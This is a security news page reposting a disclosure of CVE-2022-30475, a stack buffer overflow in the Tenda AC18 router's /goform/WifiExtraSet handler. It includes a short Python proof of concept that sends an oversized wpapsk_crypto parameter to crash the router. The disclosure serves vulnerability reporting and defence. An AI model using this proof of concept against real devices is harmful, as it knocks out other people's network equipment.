Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30475: VulnRepo/IoT/Tenda/3 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

CVE
Open in Source
#vulnerability#buffer_overflow#wifi

Tenda Router AC18 Vulnerability

This vulnerability lies in the /goform/WifiExtraSet page which influences the lastest version of Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318))

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function fromSetWirelessRepeat.

In function fromSetWirelessRepeat it reads user provided parameter wpapsk_crypto into victim_buf, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer vuln_buf.

So by requesting the page /goform/WifiExtraSet, the attacker can easily perform a Deny of Service Attack.

PoC

import requests

IP = “10.10.10.1” url = f"http://{IP}/goform/WifiExtraSet?" url += “wl_mode=not_ap&security=wpapsk&wpapsk_key=kkkkkkkk&wpapsk_crypto=” + “s” * 0x600

response = requests.get(url)

Timeline

  • 2022-05-07: Report to CVE & CNVD;
  • 2022-05-26: CVE ID assigned (CVE-2022-30475)

Acknowledge

Credit to @peanuts and @cylin from IIE, CAS.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE